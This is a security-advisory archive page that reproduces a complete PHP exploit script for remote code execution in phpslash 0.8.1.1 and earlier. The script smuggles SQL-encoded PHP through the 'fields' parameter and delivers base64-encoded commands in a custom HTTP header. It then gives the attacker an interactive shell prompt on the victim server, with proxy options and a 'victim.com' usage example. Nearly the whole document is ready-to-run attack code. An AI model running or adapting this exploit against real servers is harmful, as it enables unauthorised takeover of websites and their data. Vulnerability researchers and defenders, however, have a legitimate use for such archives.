SecurityvulnsSECURITYVULNS:DOC:21293phpslash <= 0.8.1.1 Remote Code Execution Exploit
#!/usr/bin/php -q
<?php
This file requires the PhpSploit class.
If you want to use this class, the latest
version can be downloaded from acid-root.new.fr.
##################################################
phpslash <= 0.8.1.1 Remote Code Execution Exploit
- - - - - - - - - - - - - - - - - - - - - - - - -
RCE with no special rights (guest).
No special PHP conditions required.
- - - - - - - - - - - - - - - - - - - - - - - - -
#0 It was a private sploit, but I decided to publish
it #1 You did the fag on that one bro, it will not happen
again =). #2 Don't try to use it on hzv, I helped them
to patch this one before I publish it =)
- - - - - - - - - - - - - - - - - - - - - - - - -
Exploitation steps:
1 - include/class/tz_functions.inc tz_strftime()
2 - include/class/tz_functions.inc tz_generic()
3 - include/tz_env.class generic()
error_reporting( E_ALL ^ E_NOTICE );
require('phpsploitclass.php');
// Main function
function main()
{
// :)
$web = new phpsploit();
$web->agent( 'Mozilla Firefox' );
// Hey ya :)
head();
// Target
$url = get_p( 'url', true );
// Proxy options
$prh = get_p( 'proxhost' );
$pra = get_p( 'proxauth' );
// Use a proxy ?
if( $prh )
{
// host:ip
$web->proxy( $prh );
// Authentication
if( $pra )
$web->proxyauth( $pra );
}
// Single quote bypass
$byp = "1');";
// PHP code
$php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
// Separator
$s_sep = md5( rand( 0, 1000000000 ) . 'HEY_YA' );
$c_sep = "print('$s_sep');";
// Final PHP code
$final = $byp . $c_sep . $php . $c_sep . 'exit();//';
// Welcome guess !
while( ($cmd = cmd_prompt()) !== false )
{
// magic_quotes_gpc bypass
$web->addheader( 'MypCode', base64_encode( 'system("' . add_slashes($cmd) . '");' ) );
// Go =]
$web->get( $url . 'index.php?fields=' . to_char( $final ) . ',1' );
// Result
$res = explode( $s_sep, $web->getcontent() );
// Erf
if( !isset( $res[1] ) )
{
print "\nFailed";
exit(1);
}
// Cool
else
{
if( empty( $res[1] ) )
print "\nNo output: system() disabled OR cmd failed OR cmd without output";
else
print "\n" . $res[1];
}
}
return;
}
// No more bug with " and $
function add_slashes( $str )
{
return str_replace( '$', '\\$', addslashes( $str ) );
}
// Command prompt
function cmd_prompt()
{
print "\nshell>";
$cmd = trim( fgets( STDIN ) );
// Wanna stop =( ?
if( in_array( strtolower( $cmd ) , array( 'exit', 'quit' ) ) )
return false;
else
return $cmd;
}
// MySQL CHAR() encoding
function to_char( $data )
{
$chars = 'CHAR(';
$len = strlen( $data );
for( $i = 0; $i < $len; $i++ )
{
$chars .= ord( $data[ $i ] );
if( $i != $len-1 )
$chars .= ',';
}
return $chars . ')';
}
// CLI params
function get_p( $p, $exit = false )
{
foreach( $_SERVER['argv'] as $key => $value )
{
if( $value === '-' . $p )
{
if( isset( $_SERVER['argv'][ $key+1 ] ) &&
!empty( $_SERVER['argv'][ $key+1 ] ) )
{
return $_SERVER['argv'][ $key+1 ];
}
else
{
if( $exit )
usage();
return true;
}
}
}
if( $exit )
usage();
return false;
}
// Headers =)
function head()
{
print "\nphpslash <= 0.8.1.1 Remote Code Execution Exploit\n";
print "-------------------------------------------------\n\n";
print " About: \n";
print " by DarkFig < gmdarkfig (at) gmail (dot) com >\n";
print " http://acid-root.new.fr/\n";
print " #[email protected]\n\n";
return;
}
// Usage, can helpβ¦
function usage()
{
print " Usage:\n";
print " php spl.php -url <website> [options]\n\n";
print " Example:\n";
print " php spl.php -url http://victim.com/\n\n";
print " Options:\n";
print " -proxhost <ip:port> if you wanna use a proxy\n";
print " -proxauth <usr:pwd> proxy with authentication\n";
exit(0);
}
// Run baby
main();
?>